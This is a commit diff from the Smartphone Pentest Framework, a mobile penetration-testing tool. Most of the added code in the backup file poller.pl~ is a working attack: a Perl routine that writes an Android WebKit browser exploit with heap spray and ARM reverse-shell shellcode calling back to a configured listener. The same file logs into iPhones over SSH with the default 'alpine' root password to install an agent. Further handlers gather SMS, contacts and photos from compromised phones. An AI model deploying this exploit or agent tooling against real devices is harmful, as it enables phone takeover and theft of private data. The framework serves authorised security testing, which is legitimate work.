0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/FunctionListActivity.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/GetAgentsActivity.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/GetDataActivity.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/InternetPoll.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/RemoteAttackActivity.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/SMSReceiver.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/SMSService.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/SendCommandActivity.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/ServiceAutoStarter.java 100644 → 100755
File mode changed.
View
4 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/SocialAttackActivity.java 100644 → 100755
@@ -136,7 +136,9 @@ else if(sel.equals("Browser Exploits"))
String sendstr2 = sendstr1.concat("20101759 ");
String sendstr3 = sendstr2.concat(path);
String sendstr4 = sendstr3.concat(" ");
- sendstr = sendstr4.concat(filename);
+ String sendstr5 = sendstr4.concat(filename);
+ String sendstr6 = sendstr5.concat(" ");
+ sendstr = sendstr6.concat(number);
Intent intent = new Intent(getApplicationContext(),WebUploadService2.class);
intent.putExtra("uploadstring", sendstr);
startService(intent);
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/WebUploadService.java 100644 → 100755
File mode changed.
View
0 FrameworkAndroidApp/src/com/bulbsecurity/framework/app/WebUploadService2.java 100644 → 100755
File mode changed.
View
0 README.md 100644 → 100755
File mode changed.
View
2 frameworkconsole/agentpoll.pl
@@ -36,7 +36,7 @@
system($catcommand);
@split = split(/ /, $line);
if (@split[0] eq $key)
-∠{
+ {
if (@split[1] eq "ROOT")
{
$delivery = @split[2];
View
8 frameworkconsole/config
@@ -1,10 +1,12 @@
#SMARTPHONE PENTEST FRAMEWORK CONFIG FILE
#ROOT DIRECTORY FOR THE WEBSERVER THAT WILL HOST OUR FILES
WEBSERVER = /opt/lampp/htdocs
-#IPADDRESS TO LISTEN ON
-IPADDRESS = 10.0.1.6
+#IPADDRESS FOR WEBSERVER (webserver needs to be listening on this address)
+IPADDRESS = 192.168.20.38
+#IP ADDRESS TO LISTEN ON FOR SHELLS
+SHELLIPADDRESS = 192.168.20.38
#IP ADDRESS OF SQLSERVER 127.0.0.1 IF LOCALHOST
-MYSQLSERVER = 10.0.1.2
+MYSQLSERVER = 192.168.20.31
#USERNAME OF THE MYSQL USER TO USE
MYSQLUSER = root
#PASSWORD OF THE MYSQL USER TO USE
View
5 frameworkconsole/framework.pl
@@ -155,6 +155,7 @@ sub client_side
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
+ $shellipaddress = $Variables{"SHELLIPADDRESS"};
while(1)
{
print "Select a Client Side Attack to Run\n";
@@ -181,7 +182,7 @@ sub client_side
$fullpath = $webserver. $path;
$command1 = "mkdir " . $fullpath;
system($command1);
- $ipaddresscopy = $ipaddress;
+ $ipaddresscopy = $shellipaddress;
@octets = split(/\./, $ipaddresscopy);
$out1 = pack "c", @octets[0];
$hex1 = unpack "H2" , $out1;
@@ -268,7 +269,7 @@ sub client_side
print CONTROLFILE $command2;
close(CONTROLFILE);
$vulnerable = "no";
- $socket = new IO::Socket::INET (LocalHost => $ipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
+ $socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
if ($data_socket = $socket->accept())
{
$data="/system/bin/id\n";
View
19 frameworkconsole/poller.pl
@@ -83,9 +83,11 @@
{
$mypath = @split[2];
$myfile = @split[3];
+ $number = @split[4];
$command1 = "mkdir " . $webserver . $mypath;
system($command1);
- $ipaddresscopy = $ipaddress;
+ $shellipaddress = $Variables{"SHELLIPADDRESS"};
+ $ipaddresscopy = $shellipaddress;
@octets = split(/\./, $ipaddresscopy);
$out1 = pack "c", @octets[0];
$hex1 = unpack "H2" , $out1;
@@ -146,7 +148,7 @@
print SPLOITFILE "</html>\n";
close(SPLOITFILE);
$vulnerable = "no";
- $socket = new IO::Socket::INET (LocalHost => $ipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1);
+ $socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1);
if ($data_socket = $socket->accept())
{
$data="/system/bin/id\n";
@@ -159,6 +161,19 @@
print GETFILE $vulnerable;
close(GETFILE);
}
+ $table = "client";
+ $sqlserver = $Variables{"MYSQLSERVER"};
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
+ $number2 = "\"" . $number . "\"";
+ $vulnerable2 = "\"" . $vulnerable . "\"";
+ $webkit = "\"" . "webkit" . "\"";
+ $insertquery = "INSERT INTO $table (id,number,exploit,vuln) VALUES (DEFAULT,$number2,$webkit,$vulnerable2)";
+ $sql = $dbh->prepare($insertquery);
+ $sql->execute;
+
}
View
5 frameworkgui/androidwebkit.pl
@@ -18,6 +18,7 @@
$webserver = $Variables{"WEBSERVER"};
$sqlserver = $Variables{"MYSQLSERVER"};
$ipaddress = $Variables{"IPADDRESS"};
+ $shellipaddress = $Variables{"SHELLIPADDRESS"};
$path = $ARGV[0];
$filename = $ARGV[1];
$number = $ARGV[2];
@@ -26,7 +27,7 @@
$fullpath = $webserver. $path;
$command1 = "mkdir " . $fullpath;
system($command1);
- $ipaddresscopy = $ipaddress;
+ $ipaddresscopy = $shellipaddress;
@octets = split(/\./, $ipaddresscopy);
$out1 = pack "c", @octets[0];
$hex1 = unpack "H2" , $out1;
@@ -107,7 +108,7 @@
print CONTROLFILE $command2;
close(CONTROLFILE);
$vulnerable = "no";
- $socket = new IO::Socket::INET (LocalHost => $ipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
+ $socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1, Timeout=> 180);
if ($data_socket = $socket->accept())
{
$data="/system/bin/id\n";
View
15 frameworkgui/config
@@ -1,18 +1,19 @@
#SMARTPHONE PENTEST FRAMEWORK CONFIG FILE
#ROOT DIRECTORY FOR THE WEBSERVER THAT WILL HOST OUR FILES
WEBSERVER = /opt/lampp/htdocs
-#IPADDRESS TO LISTEN ON
-IPADDRESS = 10.0.1.4
+#IPADDRESS FOR WEBSERVER (webserver needs to be listening on this address)
+IPADDRESS = 192.168.20.38
+#IP ADDRESS TO LISTEN ON FOR SHELLS
+SHELLIPADDRESS = 192.168.20.38
#IP ADDRESS OF SQLSERVER 127.0.0.1 IF LOCALHOST
-MYSQLSERVER = 10.0.1.2
+MYSQLSERVER = 192.168.20.31
#USERNAME OF THE MYSQL USER TO USE
MYSQLUSER = root
#PASSWORD OF THE MYSQL USER TO USE
MYSQLPASS = password
#PORT MYSQL IS RUNNING ON (3306 IS DEFAULT)
MYSQLPORT = 3306
#LOCATION OF ANDROID APK FOR AGENT DROP
-ANDROIDAGENT = /opt/lampp/htdocs/frameworkgui/AndroidAgent.apk
-#LOCATION OF IPHONE DEB FOR AGENT DROP#
-IPHONEAGENT = /opt/lampp/htdocs/frameworkgui/iphone.deb
-
+ANDROIDAGENT = /root/AndroidAgent.apk
+#LOCATION OF IPHONE DEB FOR AGENT DROP
+IPHONEAGENT = /root/iphone.deb
View
19 frameworkgui/poller.pl
@@ -83,9 +83,11 @@
{
$mypath = @split[2];
$myfile = @split[3];
+ $number = @split[4];
+ $shellipaddress = $Variables{"SHELLIPADDRESS"};
$command1 = "mkdir " . $webserver . $mypath;
system($command1);
- $ipaddresscopy = $ipaddress;
+ $ipaddresscopy = $shellipaddress;
@octets = split(/\./, $ipaddresscopy);
$out1 = pack "c", @octets[0];
$hex1 = unpack "H2" , $out1;
@@ -146,7 +148,7 @@
print SPLOITFILE "</html>\n";
close(SPLOITFILE);
$vulnerable = "no";
- $socket = new IO::Socket::INET (LocalHost => $ipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1);
+ $socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1);
if ($data_socket = $socket->accept())
{
$data="/system/bin/id\n";
@@ -159,7 +161,18 @@
print GETFILE $vulnerable;
close(GETFILE);
}
-
+ $table = "client";
+ $sqlserver = $Variables{"MYSQLSERVER"};
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
+ $number2 = "\"" . $number . "\"";
+ $vulnerable2 = "\"" . $vulnerable . "\"";
+ $webkit = "\"" . "webkit" . "\"";
+ $insertquery = "INSERT INTO $table (id,number,exploit,vuln) VALUES (DEFAULT,$number2,$webkit,$vulnerable2)";
+ $sql = $dbh->prepare($insertquery);
+ $sql->execute;
}
View
388 frameworkgui/poller.pl~
@@ -0,0 +1,388 @@
+#!/usr/bin/perl
+use DBI;
+use Cwd;
+use Expect;
+use IO::Socket;
+$configfile = "config";
+ open(CONFIG, "+<$configfile");
+while (<CONFIG>)
+{
+ chomp;
+ s/#.*//;
+ s/^\s+//;
+ s/\s+$//;
+ ($var, $value) = split(/\s*=\s*/, $_, 2);
+ $Variables{$var} = ${value};
+}
+$Variables{"OS"} = $^O;
+$ipaddress = $Variables{"IPADDRESS"};
+$webserver = $Variables{"WEBSERVER"};
+$path = $ARGV[0];
+$key = $ARGV[1];
+$sqlserver = $Variables{"MYSQLSERVER"};
+while(1)
+ {
+ $fullpath5 = $webserver . $path . "/putfunc";
+ open(PUTFILE, "+<$fullpath5");
+ $line= <PUTFILE>;
+ close(PUTFILE);
+ open(PUTFILE2, ">$fullpath5");
+ print PUTFILE2;
+ close(PUTFILE2);
+ @split = split(/ /, $line);
+ if (@split[0] eq $key)
+ {
+
+ if (@split[1] eq "alpine")
+ {
+ $vulnerable = "no";
+ $agent = "no";
+ $command = 'sftp';
+ $victim = @split[2];
+ $param = "root@" . $victim;
+ $timeout = 10;
+ $passwordstring = $parm . "'s password: ";
+ $putfile = "com.bulbsecurity.tooltest_0.0.1-23_iphoneos-arm.deb";
+ $connectstring = "Connecting to " . $victim . "...";
+ $installcommand = "dpkg -i com.bulbsecurity.tooltest_0.0.1-23_iphoneos-arm.deb\n";
+ $exp = Expect->spawn($command, $param) or die "Cannot spawm sftp command";
+ $exp->expect($timeout,[$connectstring]);
+ $exp->expect($timeout,["Are you sure you want to continue connecting (yes/no)?", sub {my $self = shift; $self->send("yes\n");}]);
+ $exp->expect($timeout, $passwordstring);
+ $exp->send("alpine\n");
+ if ($exp->expect($timeout, ["sftp>"]))
+ {
+ $vulnerable="yes";
+
+ }
+ $exp->send("put $putfile\n");
+ $exp->expect($timeout, ["sftp>"]);
+ $exp->send("bye\n");
+ $command2 = "ssh";
+ $exp = Expect->spawn($command2, $param);
+ $exp->expect($timeout, $passwordstring);
+ $exp->send("alpine\n");
+ $exp->expect($timeout, [qr'root\s*']) ;
+ $exp->send($installcommand);
+ $exp->expect($timeout, "Setting up com.bulbsecurity.tooltest (0.0.1-23) ...");
+ $exp->send("tooltest\n");
+ if($exp->expect($timeout,["Smartphone Pentest Framework Agent"]))
+ {
+ $agent="yes";
+ }
+ $exp->send("exit");
+ $exp->soft_close();
+ $fullpath2 = $webserver. $path . "/text2.txt";
+ open(GETFILE, ">$fullpath2");
+ print GETFILE "Apline Agent " . $agent;
+ close(GETFILE);
+
+
+ }
+ elsif(@split[1] eq "20101759")
+ {
+ $mypath = @split[2];
+ $myfile = @split[3];
+ $number = @split[4];
+ $shellipaddress = $Variables{"SHELLIPADDRESS"};
+ $command1 = "mkdir " . $webserver . $mypath;
+ system($command1);
+ $ipaddresscopy = $shellipaddress;
+ @octets = split(/\./, $ipaddresscopy);
+ $out1 = pack "c", @octets[0];
+ $hex1 = unpack "H2" , $out1;
+ $out2 = pack "c", @octets[1];
+ $hex2 = unpack "H2" , $out2;
+ $out3 = pack "c", @octets[2];
+ $hex3 = unpack "H2" , $out3;
+ $out4 = pack "c", @octets[3];
+ $hex4 = unpack "H2" , $out4;
+ $sploitfile = $webserver . $mypath . $myfile;
+ $command8 = "touch " . $sploitfile;
+ system($command8);
+ $command9 = "chmod 777 " . $sploitfile;
+ system($command9);
+ open(SPLOITFILE, ">$sploitfile");
+ print SPLOITFILE "<html>\n";
+ print SPLOITFILE "<head>\n";
+ print SPLOITFILE "<script>\n";
+ print SPLOITFILE "var ip = unescape(\"\\u" . $hex2 . $hex1 . "\\u" . $hex4 . $hex3 . "\");\n";
+ print SPLOITFILE "var port = unescape(\"\\u3930\");\n";
+ print SPLOITFILE "function trigger()\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "var span = document.createElement(\"div\");\n";
+ print SPLOITFILE "document.getElementById(\"BodyID\").appendChild(span);\n";
+ print SPLOITFILE "span.innerHTML = -parseFloat(\"NAN(ffffe00572c60)\");\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "function exploit()\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "var nop = unescape(\"\\u33bc\\u0057\");\n";
+ print SPLOITFILE "do\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "nop+=nop;\n";
+ print SPLOITFILE "} while (nop.length<=0x1000);\n";
+ print SPLOITFILE "var scode = nop+unescape(\"\\u1001\\ue1a0\\u0002\\ue3a0\\u1001\\ue3a0\\u2005\\ue281\\u708c\\ue3a0\\u708d\\ue287\\u0080\\uef00\\u6000\\ue1a0\\u1084\\ue28f\\u2010\\ue3a0\\u708d\\ue3a0\\u708e\\ue287\\u0080\\uef00\\u0006\\ue1a0\\u1000\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1001\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u0006\\ue1a0\\u1002\\ue3a0\\u703f\\ue3a0\\u0080\\uef00\\u2001\\ue28f\\uff12\\ue12f\\u4040\\u2717\\udf80\\ua005\\ua508\\u4076\\u602e\\u1b6d\\ub420\\ub401\\u4669\\u4052\\u270b\\udf80\\u2f2f\\u732f\\u7379\\u6574\\u2f6d\\u6962\\u2f6e\\u6873\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u2000\\u0002\");\n";
+ print SPLOITFILE "scode += port;\n";
+ print SPLOITFILE "scode += ip;\n";
+ print SPLOITFILE "scode += unescape(\"\\u2000\\u2000\");\n";
+ print SPLOITFILE "target = new Array();\n";
+ print SPLOITFILE "for(i = 0; i < 0x1000; i++)\n";
+ print SPLOITFILE "target[i] = scode;\n";
+ print SPLOITFILE "for (i = 0; i <= 0x1000; i++)\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "document.write(target[i]+\"<i>\");\n";
+ print SPLOITFILE "if (i>0x999)\n";
+ print SPLOITFILE "{\n";
+ print SPLOITFILE "trigger();\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "}\n";
+ print SPLOITFILE "</script>\n";
+ print SPLOITFILE "</head>\n";
+ print SPLOITFILE "<body id=\"BodyID\">\n";
+ print SPLOITFILE "Enjoy!\n";
+ print SPLOITFILE "<script>\n";
+ print SPLOITFILE "exploit();\n";
+ print SPLOITFILE "</script>\n";
+ print SPLOITFILE "</body>\n";
+ print SPLOITFILE "</html>\n";
+ close(SPLOITFILE);
+ $vulnerable = "no";
+ $socket = new IO::Socket::INET (LocalHost => $shellipaddress, LocalPort => '12345', Proto => 'tcp' , Listen => 1, Reuse => 1);
+ if ($data_socket = $socket->accept())
+ {
+ $data="/system/bin/id\n";
+ print $data_socket $data;
+ $data=<$data_socket>;
+ close($data_socket);
+ $vulnerable = "yes";
+ $fullpath2 = $webserver. $path . "/text2.txt";
+ open(GETFILE, ">$fullpath2");
+ print GETFILE $vulnerable;
+ close(GETFILE);
+ }
+ $table = "client";
+ $sqlserver = $Variables{"MYSQLSERVER"};
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
+ $number2 = "\"" . $number . "\"";
+ $vulnerable2 = "\"" . $vulnerable . "\"";
+ $webkit = "\"" . "webkit" . "\"";
+ $insertquery = "INSERT INTO $table (id,number,exploit,vuln) VALUES (DEFAULT,$number2,$webkit,$vulnerable2)";
+ $sql = $dbh->prepare($insertquery);
+ $sql->execute;
+
+ }
+
+ elsif (@split[1] eq "ANDROID")
+ {
+ $mypath = @split[2];
+ $myfile = @split[3];
+ $command1 = "mkdir " . $webserver . $mypath;
+ system($command1);
+ $androidagent = $Variables{"ANDROIDAGENT"};
+ $command = "cp " . $androidagent . " " . $webserver . $mypath . $myfile;
+ system($command);
+
+ }
+ elsif (@split[1] eq "IPHONE")
+ {
+
+ }
+ elsif (@split[1] eq "BLACKBERRY")
+ {
+
+ }
+ elsif (@split[1] eq "AGENTS")
+ {
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
+ $rowsquery = "SELECT COUNT(*) from agents";
+ $sql = $dbh->prepare($rowsquery);
+ $results = $sql->execute;
+ @rows = $sql->fetchrow_array();
+ $row = @rows[0];
+ $fullpath2 = $webserver . $path . "/text2.txt";
+ open(CLEARFILE2, ">$fullpath2");
+ print CLEARFILE2;
+ close(CLEARFILE2);
+ open(GETFILE, ">$fullpath2");
+ if ($row == 0)
+ {
+ print GETFILE $key . " NONE\n";
+ close(GETFILE);
+ }
+ else
+ {
+ print GETFILE $key . " AGEN\n";
+ for($i=1; $i<=$row; $i++)
+ {
+ $selectquery = "SELECT number from agents where id=" . $i;
+ $sql = $dbh->prepare($selectquery);
+ $results = $sql->execute;
+ @rows = $sql->fetchrow_array();
+ $r = @rows[0];
+ $selectquery2 = "SELECT controlkey from agents where id=" . $i;
+ $sql = $dbh->prepare($selectquery2);
+ $results = $sql->execute;
+ @rows2 = $sql->fetchrow_array();
+ $q = @rows2[0];
+ $agentlistitem = $i . ".) " . $r . " " . $q . "\n";
+ print GETFILE $agentlistitem;
+
+ }
+ close(GETFILE);
+ }
+ }
+ elsif (@split[1] eq "ROOT")
+ {
+ $i = @split[2];
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
+ $selectquery = "SELECT path from agents where id=" . $i;
+ $sql = $dbh->prepare($selectquery);
+ $results = $sql->execute;
+ @rows = $sql->fetchrow_array();
+ $path1 = @rows[0];
+ sleep 60;
+ $text = $webserver . $path1 . "/text.txt";
+ open(TEXTFILE, "+<$text");
+ $line= <TEXTFILE>;
+ if ($line eq "Root Succeeded")
+ {
+ $table = "data";
+ $yes = "yes";
+ $insertquery = "UPDATE $table SET root=" . "'" . $yes . "'" . " WHERE id=" . "'" . $i . "'";
+ $sql = $dbh->prepare($insertquery);
+ $sql->execute;
+ }
+ close(TEXTFILE);
+ open(TEXTFILE2, ">$text");
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+
+ elsif (@split[1] eq "PICT")
+ {
+ $i = @split[2];
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
+ $selectquery = "SELECT path from agents where id=" . $i;
+ $sql = $dbh->prepare($selectquery);
+ $results = $sql->execute;
+ @rows = $sql->fetchrow_array();
+ $path1 = @rows[0];
+ sleep 5;
+ $picturefile = $webserver . $path1 . "/picture.jpg";
+ open(PICTURE, "+<$picturefile");
+ if (!(-z PICTURE))
+ {
+ $command = "cp" . " " . $picturefile . " " . ".";
+ system($command);
+ $picturedir = getcwd();
+ $table = "data";
+ $picture = $picturedir . "/" . "picture.jpg";
+ $insertquery = "UPDATE $table SET picture=" . "'" . $picture . "'" . " WHERE id=" . "'" . $i . "'";
+ #print $insertquery;
+ $sql = $dbh->prepare($insertquery);
+ $sql->execute;
+ close(PICTURE);
+ open(PICTURE2, ">$picturefile");
+ print PICTURE2 "";
+ close(PICTURE2);
+ }
+ }
+ elsif (@split[1] eq "SMSS")
+ {
+ $i = @split[2];
+ sleep 5;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "+<$text");
+ $line= <TEXTFILE>;
+ $table = "data";
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
+ $insertquery = "UPDATE $table SET sms=" . "'" . $line . "'" . " WHERE id=" . "'" . $i . "'";
+ $sql = $dbh->prepare($insertquery);
+ $sql->execute;
+ close(TEXTFILE);
+ open(TEXTFILE2, ">$text");
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+ }
+ elsif (@split[1] eq "CONT")
+ {
+ $i = @split[2];
+ sleep 5;
+ $text = $webserver . $path . "/text.txt";
+ open(TEXTFILE, "+<$text");
+ $line= <TEXTFILE>;
+ $table = "data";
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
+ $insertquery = "UPDATE $table SET contacts=" . "'" . $line . "'" . " WHERE id=" . "'" . $i . "'";
+ $sql = $dbh->prepare($insertquery);
+ $sql->execute;
+ close(TEXTFILE);
+ open(TEXTFILE2, ">$text");
+ print TEXTFILE2 "";
+ close(TEXTFILE2);
+
+ }
+ elsif (@split[1] eq "DATA")
+ {
+ $id = @split[2];
+ $username = $Variables{"MYSQLUSER"};
+ $password = $Variables{"MYSQLPASS"};
+ $port = $Variables{"MYSQLPORT"};
+ $dbh = DBI->connect("dbi:mysql:database=framework;host=$sqlserver;port=$port", $username,$password);
+ $database = framework;
+ $query1 = "SELECT sms from data where id=" . $id;
+ $sql = $dbh->prepare($query1);
+ $sms = $sql->execute;
+ @rows = $sql->fetchrow_array();
+ $smsrow= @rows[0];
+ $query2 = "SELECT contacts from data where id=" . $id;
+ $sql = $dbh->prepare($query2);
+ $contacts = $sql->execute;
+ @rows = $sql->fetchrow_array();
+ $contactsrow = @rows[0];
+ $query3 = "SELECT picture from data where id=" . $id;
+ $sql = $dbh->prepare($query3);
+ $picture = $sql->execute;
+ @rows = $sql->fetchrow_array();
+ $picturerow = @rows[0];
+ $query4 = "SELECT root from data where id=" . $id;
+ $sql = $dbh->prepare($query4);
+ $root = $sql->execute;
+ @rows = $sql->fetchrow_array();
+ $rootrow = @rows[0];
+ $fullpath2 = $webserver . $path . "/text2.txt";
+ open(CLEARFILE2, ">$fullpath2");
+ print CLEARFILE2;
+ close(CLEARFILE2);
+ open(GETFILE, ">$fullpath2");
+ print GETFILE "SMS Database: " . $smsrow . "\n";
+ print GETFILE "Contacts: " . $contactsrow . "\n";
+ print GETFILE "Picture Location: " . $picturerow . "\n";
+ print GETFILE "Rooted?: " . $rootrow . "\n";
+ close(GETFILE);
+
+
+ }
+
+ }
+}
+
View
0 license.rtf 100644 → 100755
File mode changed.

0 comments on commit c582b83

Please sign in to comment.
Something went wrong with that request. Please try again.